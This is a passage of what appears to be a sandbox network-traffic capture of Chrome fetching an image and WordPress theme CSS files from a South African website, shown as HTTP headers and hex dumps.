                                                                                                                      2024-12-03 07:55:28 UTC380OUTGET /wp-content/uploads/2018/02/IMAGE-1.jpg HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:29 UTC264INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:28 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:05 GMT
                                                                                                                      ETag: "5df2b-56723b531a840"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 384811
                                                                                                                      Content-Type: image/jpeg
                                                                                                                      2024-12-03 07:55:29 UTC7928INData Raw: ff d8 ff e1 3e 4e 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 10 01 00 00 03 00 00 00 01 0e 74 00 00 01 01 00 03 00 00 00 01 07 3a 00 00 01 02 00 03 00 00 00 03 00 00 00 ce 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 d4 01 1b 00 05 00 00 00 01 00 00 00 dc 01 28 00 03 00 00 00 01 00 03 00 00 01 31 00 02 00 00 00 1e 00 00 00 e4 01 32 00 02 00 00 00 14 00 00 01 02 9c 9b 00 02 00 00 00 25 00 00 01 16 9c 9e 00 01 00 00 03 7a 00 00 01 3b 9c 9f 00 02 00 00 00 25 00 00 04 b5 ea 1c 00 07 00 00 13 94 00 00 04 da 87 69 00 04 00 00 00 01 00 00 18 70 00 00 2d 68 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70
                                                                                                                      Data Ascii: >NExifMM*t:(12%z;%ip-h''Adobe Photoshop
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 36 2f 4a dc e7 f9 7e 3f de 98 64 2c 91 91 e6 a6 32 3c d4 da 30 6a ff 00 ff d9 ff ed 1a 64 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 0f 1c 01 5a 00 03 1b 25 47 1c 02 00 00 02 00 00 00 38 42 49 4d 04 25 00 00 00 00 00 10 cd cf fa 7d a8 c7 be 09 05 70 76 ae af 05 c3 4e 38 42 49 4d 04 3a 00 00 00 00 00 93 00 00 00 10 00 00 00 01 00 00 00 00 00 0b 70 72 69 6e 74 4f 75 74 70 75 74 00 00 00 05 00 00 00 00 43 6c 72 53 65 6e 75 6d 00 00 00 00 43 6c 72 53 00 00 00 00 52 47 42 43 00 00 00 00 49 6e 74 65 65 6e 75 6d 00 00 00 00 49 6e 74 65 00 00 00 00 43 6c 72 6d 00 00 00 00 4d 70 42 6c 62 6f 6f 6c 01 00 00 00 0f 70 72 69 6e 74 53 69 78 74 65 65 6e 42 69 74 62 6f 6f 6c 00 00 00 00 0b 70 72 69 6e 74 65 72 4e 61 6d 65 54 45 58 54 00 00
                                                                                                                      Data Ascii: 6/J~?d,2<0jdPhotoshop 3.08BIMZ%G8BIM%}pvN8BIM:printOutputClrSenumClrSRGBCInteenumInteClrmMpBlboolprintSixteenBitboolprinterNameTEXT
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 77 6f 72 6b 5c 41 70 72 69 6c 5c 50 6c 61 6e 73 68 65 74 73 5c 31 37 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 32 2d 30 34 2d 32 36 54 32 33 3a 33 35 3a 33 32 2b 30 36 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 48 3a 5c 50 68 6f 74 6f 73 68 6f 70 77 6f 72 6b 5c 41 70 72 69 6c 5c 50 6c 61 6e 73 68 65 74 73 5c 31 38 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 32 2d 30 34 2d 32 36 54 32 33 3a 33 36 3a 34 37 2b 30 36 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 77 6f 72 6c 64 5f 6d 61 70 2e 70 73 64 20 63 6c 6f 73 65 64 26 23 78 41 3b 32 30 31 32 2d 30 34 2d 32 36 54 32 33 3a 34 31 3a 30 33 2b 30 36 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 48 3a 5c 50 68 6f 74 6f 73 68 6f 70 77 6f 72 6b 5c 41 70 72 69 6c 5c 50 6c 61 6e 73 68 65 74 73 5c 31 39 2e 70
                                                                                                                      Data Ascii: work\April\Planshets\17.psd saved&#xA;2012-04-26T23:35:32+06:00&#x9;File H:\Photoshopwork\April\Planshets\18.psd saved&#xA;2012-04-26T23:36:47+06:00&#x9;File world_map.psd closed&#xA;2012-04-26T23:41:03+06:00&#x9;File H:\Photoshopwork\April\Planshets\19.p
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 45 38 45 39 43 39 44 32 46 46 46 33 34 31 45 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 35 2e 31 20 57 69 6e 64 6f 77 73 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 31 32 2d 30 34 2d 32 36 54 32 33 3a 33 32 3a 35 37 2b 30 36 3a 30 30 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 31 31 41 38 30 45 41 34 43 32 38 46 45 31 31 31 38 45 38 45 39 43 39 44 32 46 46 46 33 34 31 45 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43
                                                                                                                      Data Ascii: E8E9C9D2FFF341E" stEvt:softwareAgent="Adobe Photoshop CS5.1 Windows" stEvt:when="2012-04-26T23:32:57+06:00"/> <rdf:li stEvt:action="saved" stEvt:changed="/" stEvt:instanceID="xmp.iid:11A80EA4C28FE1118E8E9C9D2FFF341E" stEvt:softwareAgent="Adobe Photoshop C
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 73 63 69 65 6e 63 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 65 6c 65 63 74 72 6f 6e 69 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 74 65 63 68 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 62 75 74 74 6f 6e 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 67 72 61 70 68 69 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 6d 61 6c 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 69 63 6f 6e 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 69 6e 74 65 72 61 63 74 69 6f 6e 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 6e 65 74 77 6f 72 6b 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 20 74 6f 75 63 68 73 63 72 65
                                                                                                                      Data Ascii: f:li> <rdf:li> science</rdf:li> <rdf:li> electronic</rdf:li> <rdf:li> tech</rdf:li> <rdf:li> button</rdf:li> <rdf:li> graphic</rdf:li> <rdf:li> male</rdf:li> <rdf:li> icon</rdf:li> <rdf:li> interaction</rdf:li> <rdf:li> network</rdf:li> <rdf:li> touchscre
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: b8 bf fb 11 fe 36 23 de f4 2f 11 c7 af 74 f3 86 a3 2f 93 a5 5d 02 40 c6 a3 d0 d4 b2 56 2b 01 4b 50 4f f9 2c 4c 92 cd 6b 5f d2 7d 3f ab f1 ed f8 54 b4 aa 38 f1 f2 af 91 f2 ff 00 57 af 4c dc 9a 42 e6 b4 e1 e7 4f 31 e7 e5 fe a1 d0 c9 16 10 8c ab ab c1 1a 47 0d 5d 2b cf 5a 36 86 54 b5 34 4c 71 95 2b 26 91 59 e6 d3 ab 30 90 05 17 6f 14 31 01 c3 0f 67 22 0f d5 35 5e d0 45 4f 86 d8 f8 4f af f4 a9 f6 01 d0 7c dc 0f 06 a1 bb 8a 9a 0f 15 73 f1 0f 4a 7e 12 7e d2 7d 3a e7 43 44 b2 63 69 e3 5c 5d 13 3a 19 e1 9b 4e d2 ca b4 d4 91 e4 71 98 3a 68 b2 1a 92 b5 63 6a 88 e7 60 b1 69 b3 16 6d 5c 06 e3 69 18 31 80 22 15 cd 7f 4d b1 55 51 5e 3c 6b c3 f6 f0 3d 7a 49 0a cc cc 66 6a 60 8f d4 5a 1d 2c e4 af 0e 14 e3 5f b3 ac 35 f1 e5 63 79 1a 93 6a d1 56 be 62 4a 5a b6 a7 3b 7a be
                                                                                                                      Data Ascii: 6#/t/]@V+KPO,Lk_}?T8WLBO1G]+Z6T4Lq+&Y0o1g"5^EOO|sJ~~}:CDci\]:Nq:hcj`im\i1"MUQ^<k=zIfj`Z,_5cyjVbJZ;z
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 8a fa 2d 89 24 93 f1 79 92 84 ff 00 97 fd e7 8e 7a e7 4b 95 a1 92 84 c1 51 b8 69 e1 d1 5b 8e 9c 03 86 67 90 9a da 77 db d9 36 f1 19 8c 6e b4 98 77 69 ee 02 bb 38 01 89 f4 aa d0 ab 06 04 46 78 1f 3f cc 7e d3 8e ac 60 70 fa 96 dc fc 24 7c 5e 87 50 fd ad 8e b3 55 65 28 ea 67 a4 9a 4d c1 4c 5a a6 82 8d 2b 42 62 4f 8e 9a 58 fe e3 0b 24 01 64 77 68 fc 78 9c e5 5c a0 72 80 c2 9a 42 a6 84 5d 2a 10 08 f0 ce 09 a6 7f 3f f0 81 fb 7a f2 42 ea 1d 44 26 80 9a 77 71 fc 5f f1 e5 51 f9 9a d4 d4 f5 3f f8 e5 32 e6 a3 ad 5c fd 2b 94 ad 8a 35 97 f8 4c a2 0f b7 a2 98 e2 e9 aa 35 7d cf 9d 7c b8 cc a5 44 be 92 aa 0c 2a aa 16 30 a9 ef 5e 19 d0 47 86 78 7a fe 7e 9e a0 7e de b4 2d 9b c2 d0 61 39 1e be 67 24 70 f5 00 7e 75 e3 53 d7 a9 32 94 78 f5 aa 96 9b 70 d3 4b 36 3e 9a b0 63 a1
                                                                                                                      Data Ascii: -$yzKQi[gw6nwi8Fx?~`p$|^PUe(gMLZ+BbOX$dwhx\rB]*?zBD&wq_Q?2\+5L5}|D*0^Gxz~~-a9g$p~uS2xpK6>c
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: fb a9 60 3c fa f7 59 d6 20 05 bf 36 27 fd b7 f5 e3 db 65 da a6 87 ab 85 f5 eb 2a 45 cd ad fe 37 fc fd 2e 7f db 5b dd 49 24 d4 f5 bd 22 b5 a6 7a ce 91 1b 8e 3e 9f 53 fd 4f e7 de ba b7 59 d6 1b 9e 41 ff 00 7d f4 e3 eb ef dd 6b e5 d4 85 87 91 c1 bf d4 ff 00 bd fd 39 fa 7b d5 40 eb 74 ea 4a 42 48 07 fc 7f db ff 00 c8 bd d4 b7 56 0a 4e 47 52 63 87 fb 46 d7 fa 0f f6 fe ea 4f 57 54 f5 ea 50 80 0b 10 bc db fd f5 fd eb ab 00 07 97 59 d6 1f a7 d6 df ef 1f f1 5f 7a eb 7d 48 58 be a6 d7 b9 e3 fd eb df ba f7 52 16 2b 10 3f 03 eb ff 00 11 c7 ba 97 14 eb 7d 66 58 be bc 7d 4f d7 fe 27 dd 0b 9f 2e bd 4e b3 ac 57 3f e1 fe db db 65 80 c9 3d 58 02 7a 90 b0 92 2e 47 f4 02 d6 e3 fe 35 ee 86 41 5c 75 b0 be bd 49 5a 7e 17 8f cf e7 eb f4 fc ff 00 41 ee 85 c9 ea d4 1e 9d 66 58 7f
                                                                                                                      Data Ascii: `<Y 6'e*E7.[I$"z>SOYA}k9{@tJBHVNGRcFOWTPY_z}HXR+?}fX}O'.NW?e=Xz.G5A\uIZ~AfX
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 4e 63 22 16 24 03 ea 47 1a 79 9a 7a f0 ae 2b 5e bc b7 30 3c f2 da a4 a0 dc 22 82 c0 79 06 e1 5f 20 4f 1a 56 b4 cd 28 47 51 52 05 b7 23 9e 7e bc 7d 7f 3c 7f 87 ba ac 78 a9 ea e5 e9 f3 e8 43 c6 f5 4f 60 64 f0 8b b8 71 db 5e b2 a7 15 25 3c b5 51 4c b5 38 d8 ab 2a a9 a2 05 9a 7a 2c 34 d5 b1 e6 6b a3 91 54 98 8c 34 ef e6 02 f1 ea 1e cc e1 da 6f a4 83 ea 23 b6 26 2a 57 8a d4 81 e8 b5 d4 7e 54 06 be 55 e8 aa 6d f3 6c 86 e3 e9 64 bb 55 98 1a 1c 31 00 9f 22 c0 68 1f 3a b0 a7 9d 3a 68 da fb 3b 72 6f 3c 8c b8 9d b1 8a 93 2d 90 a6 a1 9f 27 51 02 54 51 51 ac 14 14 af 0c 75 15 73 d4 64 2a 68 e9 62 86 17 a8 40 4b 38 e5 87 1e da b5 b3 b8 bc 90 c3 6b 16 b9 02 96 22 a0 50 0e 24 92 40 a6 47 9f 4f 5e df da d8 44 27 bc 9b 44 45 82 83 42 6a c7 80 01 41 35 34 3e 5d 4e dc db 07
                                                                                                                      Data Ascii: Nc"$Gyz+^0<"y_ OV(GQR#~}<xCO`dq^%<QL8*z,4kT4o#&*W~TUmldU1"h::h;ro<-'QTQQusd*hb@K8k"P$@GO^D'DEBjA54>]N


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      137192.168.2.449901196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:28 UTC601OUTGET /wp-content/themes/salient/css/build/plugins/magnific.css?ver=8.6.0 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:29 UTC282INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:28 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "1f1c-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 7964
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:29 UTC7910INData Raw: 2e 6d 66 70 2d 62 67 7b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 30 34 32 30 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 62 30 62 30 62 3b 6f 70 61 63 69 74 79 3a 2e 38 7d 2e 6d 66 70 2d 77 72 61 70 7b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 31 30 34 33 30 30 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6f 75 74 6c 69 6e 65 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69
                                                                                                                      Data Ascii: .mfp-bg{top:0;left:0;width:100%;height:100%!important;z-index:104200;overflow:hidden;position:fixed!important;background:#0b0b0b;opacity:.8}.mfp-wrap{top:0;left:0;width:100%;height:100%;z-index:104300;position:fixed;outline:0!important;-webkit-backface-vi
                                                                                                                      2024-12-03 07:55:29 UTC54INData Raw: 6f 70 61 63 69 74 79 3a 30 7d 2e 6d 66 70 2d 7a 6f 6f 6d 2d 6f 75 74 2e 6d 66 70 2d 72 65 6d 6f 76 69 6e 67 2e 6d 66 70 2d 62 67 7b 6f 70 61 63 69 74 79 3a 30 7d
                                                                                                                      Data Ascii: opacity:0}.mfp-zoom-out.mfp-removing.mfp-bg{opacity:0}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      138192.168.2.449903196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:28 UTC601OUTGET /wp-content/themes/salient/css/build/off-canvas/core.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:29 UTC283INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:28 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "584e-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 22606
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:29 UTC7909INData Raw: 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 39 30 70 78 29 7b 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 20 2e 73 65 63 6f 6e 64 61 72 79 2d 68 65 61 64 65 72 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 39 70 78 29 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 39 30 70 78 29 7b 62 6f 64 79 2e 6f 72 69 67 69 6e 61 6c 20 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 20 2e 69 6e 6e 65 72 20 2e 6f 66 66 2d 63 61 6e 76 61 73 2d 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2e 6d 6f 62 69 6c 65 2d 6f 6e 6c 79 20 2e 6d 65 6e 75 2e 73 65
                                                                                                                      Data Ascii: @media only screen and (min-width:690px){#slide-out-widget-area .secondary-header-text{display:none}}@media only screen and (max-width:999px) and (min-width:690px){body.original #slide-out-widget-area .inner .off-canvas-menu-container.mobile-only .menu.se
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 73 63 72 6f 6c 6c 62 61 72 2d 77 69 64 74 68 3a 6e 6f 6e 65 7d 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 20 2e 62 6f 74 74 6f 6d 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 3a 6e 6f 74 28 2e 66 75 6c 6c 73 63 72 65 65 6e 29 20 2e 6f 66 66 2d 63 61 6e 76 61 73 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 6c 69 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 30 20 36 70 78 20 36 70 78 20 30 7d 23 73
                                                                                                                      Data Ascii: scrollbar-width:none}#slide-out-widget-area::-webkit-scrollbar{display:none}#slide-out-widget-area .bottom-text{padding-bottom:0;font-size:12px}#slide-out-widget-area:not(.fullscreen) .off-canvas-social-links li{display:inline-block;padding:0 6px 6px 0}#s
                                                                                                                      2024-12-03 07:55:29 UTC6697INData Raw: 65 6e 75 2e 64 6c 2d 61 6e 69 6d 61 74 65 2d 6f 75 74 2d 34 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 4d 65 6e 75 41 6e 69 6d 4f 75 74 34 20 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 61 6e 69 6d 61 74 69 6f 6e 3a 4d 65 6e 75 41 6e 69 6d 4f 75 74 34 20 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 6d 65 6e 75 2e 64 6c 2d 61 6e 69 6d 61 74 65 2d 69 6e 2d 34 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 4d 65 6e 75 41 6e 69 6d 49 6e 34 20 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 61 6e 69 6d 61 74 69 6f 6e 3a 4d 65 6e 75 41 6e 69 6d 49 6e 34 20 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 6d 65 6e 75 77 72 61 70 70 65 72 3e 2e 73 75 62 2d 6d 65 6e 75 2e 64 6c 2d 61 6e 69 6d 61 74 65 2d 69 6e 2d 34 7b 2d 77 65
                                                                                                                      Data Ascii: enu.dl-animate-out-4{-webkit-animation:MenuAnimOut4 .4s ease-in-out;animation:MenuAnimOut4 .4s ease-in-out}.menu.dl-animate-in-4{-webkit-animation:MenuAnimIn4 .4s ease-in-out;animation:MenuAnimIn4 .4s ease-in-out}.menuwrapper>.sub-menu.dl-animate-in-4{-we


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      139192.168.2.449899196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:28 UTC614OUTGET /wp-content/themes/salient/css/build/off-canvas/fullscreen-legacy.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:29 UTC282INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:28 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "2420-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 9248
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:29 UTC7910INData Raw: 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2e 66 75 6c 6c 73 63 72 65 65 6e 2c 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2e 66 75 6c 6c 73 63 72 65 65 6e 2d 61 6c 74 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 72 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 37 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 70 61
                                                                                                                      Data Ascii: #slide-out-widget-area.fullscreen,#slide-out-widget-area.fullscreen-alt{position:fixed;width:100%;height:100%;right:auto;left:0;top:0;z-index:9997;background-color:transparent!important;text-align:center;display:none;overflow-y:scroll;overflow-x:hidden;pa
